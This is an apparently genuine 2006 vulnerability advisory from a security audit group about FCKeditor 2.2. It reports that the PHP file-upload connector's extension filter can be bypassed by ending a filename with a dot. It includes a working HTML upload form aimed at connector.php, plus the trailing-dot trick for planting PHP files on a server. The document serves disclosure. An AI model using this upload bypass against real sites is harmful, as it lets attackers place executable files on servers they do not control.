NSAG-196-23.02.2006.txt

`Advisory:  
NSAG-¹196-23.02.2006  
  
Research:  
NSA Group [Russian company on Audit of safety & Network security]  
  
Site of Research:  
http://www.nsag.ru or http://www.nsag.org  
  
Product:   
FCKeditor 2.2   
  
Site of manufacturer:  
http://www.fckeditor.net  
  
The status:   
19/11/2005 - Publication is postponed.   
19/11/2005 - Manufacturer is notified.   
21/02/2006 - Answer of the manufacturer is absent.   
21/02/2006 - Publication of vulnerability.  
  
Original Advisory:  
http://www.nsag.ru/vuln/893.html  
  
Risk:   
Critical   
  
Description:   
Detour of a filtration of expansions of files is possible.   
  
Influence:   
Loading of the forbidden files on target system.   
  
Exploit:  
  
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">  
File Upload<br>   
<input id="txtFileUpload" type="file" name="NewFile">   
<br>   
<input type="submit" value="Upload">   
</form>   
  
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)   
As a result on a server the file testfile.php will be created   
  
Decision:  
The decision from the manufacturer is not known. Contact us and receive consultations.  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
Our company is the independent auditor of the software in market IT.  
At present independent audit of the software becomes the standard practice  
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!  
  
  
www.nsag.ru   
«Nemesis» © 2006  
------------------------------------  
Nemesis Security Audit Group © 2006.   
  
  
`